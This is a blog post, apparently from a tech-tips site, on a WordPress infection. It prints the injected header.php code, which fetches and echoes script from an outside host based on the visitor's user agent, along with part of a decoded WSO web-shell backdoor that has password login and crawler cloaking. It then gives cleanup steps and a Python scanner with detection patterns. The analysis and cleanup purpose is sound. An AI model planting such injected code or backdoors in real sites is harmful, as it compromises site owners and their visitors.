WordPress Virus - PHP Hack - Remove WordPress Virus

A few days ago I noticed a suspicious piece of code (virus / malware) in the source of a running WordPress blog. The following PHP code had been inserted into header.php:

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

I do not know exactly what this virus is called, nor exactly what it does, but it is invisible to visitors of the affected sites. Instead, it causes a huge drop in search-engine ranking (especially in Google) and thus a significant decrease in the number of visitors to the affected websites.

Known details about the files of this virus:

1. The above code present in header.php

2. The appearance of a file wp-log.php in the wp-includes folder.


3. wp-log.php contains the following code, obfuscated with base64 and gzinflate:

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

The decoded code of wp-log.php:


<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
// Cloaking: search-engine crawlers get a fake 404 so the shell is not indexed
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

// Login form shown to anyone without a valid auth cookie
function wsoLogin() {
    die("<pre align=center><form method='post'><input name='pass' type='password' /><input type='submit' value='' /></form></pre>");
}

function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

// Authentication: the POSTed password is compared as an MD5 hash, then the hash is
// stored in a cookie named after md5() of the host name
if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
    $os = 'win';
else
    $os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
// The file manager changes directory according to the POST parameter c
if(isset($_POST['c']))
    @chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
    $home_cwd = str_replace("\\", "/", $home_cwd);
    $cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
    $cwd .= '/';
?>

4. If the file is accessed directly at numeblog.com/wp-includes/wp-log.php, a page with a password field appears. At first glance it looks like a file manager. The WSO_VERSION constant and the FilesMan default action in the decoded code identify it as the WSO web shell, a PHP backdoor whose main screen is a file manager.

REMOVING THE VIRUS FROM WORDPRESS.

1. First delete the injected code from header.php and the file wp-log.php from wp-includes.

2. Check the .htaccess file for suspicious directives, such as lines that change permissions or allow script execution.

3. Check the theme folder (/wp-content/themes/Nume_tema). Look for new files, and for existing ones (especially .php files) that have undergone suspicious changes.

4. Check the plugins folder (wp-content/plugins).

5. Check wp-content for suspicious files.

6. Check the write permissions of folders and files (chmod and chown).
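Checks 1, 3 and 5 above can be partly automated. The following Python script is an added example, not code from the original post: it walks a WordPress tree and flags .php files containing the two signatures shown on this page (the eval/gzinflate/base64_decode loader of wp-log.php and the user-agent-conditional curl fetch injected into header.php), and it runs against a constructed sample site whose file names, placeholder host and contents are assumptions.

```python
import os
import re
import tempfile

# Detection rules for the two artefacts described on this page (constructed for this
# example): the obfuscated loader in wp-log.php and the UA-conditional fetch in header.php.
RULES = {
    "obfuscated_eval": re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I),
    "ua_conditional_fetch": re.compile(
        r"HTTP_USER_AGENT[\s\S]{0,800}?curl_init\s*\([\s\S]{0,800}?echo\s+\$", re.I),
}

def scan_file(path):
    """Return the sorted names of the rules that match the PHP source at path."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return sorted(name for name, rx in RULES.items() if rx.search(src))

def scan_tree(root):
    """Walk a WordPress tree; map each flagged .php file (path relative to root) to its hits."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in (n for n in files if n.lower().endswith(".php")):
            path = os.path.join(dirpath, name)
            if hits := scan_file(path):
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings

# Constructed sample site: a clean theme file, a header.php modelled on the page's
# injected snippet (remote host replaced by a placeholder) and a wp-log.php loader.
SAMPLE_FILES = {
    "wp-content/themes/mytheme/functions.php": "<?php add_action('init', 'mytheme_setup'); ?>",
    "wp-content/themes/mytheme/header.php":
        "<?php error_reporting(0); $ua = @$_SERVER['HTTP_USER_AGENT'];\n"
        "if (preg_match('/Firefox|MSIE/i', $ua)) { $ch = curl_init();\n"
        "curl_setopt($ch, CURLOPT_URL, 'http://PLACEHOLDER.invalid/?ua=' . urlencode($ua));\n"
        "$c = curl_exec($ch); curl_close($ch); }\n"
        "if (substr($c, 1, 3) === 'scr') { echo $c; } ?>\n<html><head>",
    "wp-includes/wp-log.php": "<?php eval(gzinflate(base64_decode('PLACEHOLDER_BLOB'))) ?>",
}

def build_sample_site():
    """Write SAMPLE_FILES under a fresh temporary directory and return its root path."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```

Run scan_tree() against the document root of a real installation to get a list of files to inspect by hand; a hit is a starting point for manual review, not proof of infection on its own.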

SUGGESTIONS FOR CLEANING WORDPRESS.

1. First, it is a good idea to make a backup of all the blog files and of the database.

2. Delete the wp-admin and wp-includes folders and all .php files from the root of the site. If you have custom .php files, it is a good idea to check them manually.

3. Download the current version of WordPress and upload it.

4. Check in the database whether a user with administrator rights has been created.

That's about all we have to say about this virus, but if you have additions or if we discover new details, we will be happy to update this article.


Founder and editor of Stealth Settings, from 2006 to the present. Experience with Linux operating systems (especially CentOS), Mac OS X, Windows XP to Windows 10, and WordPress (CMS).
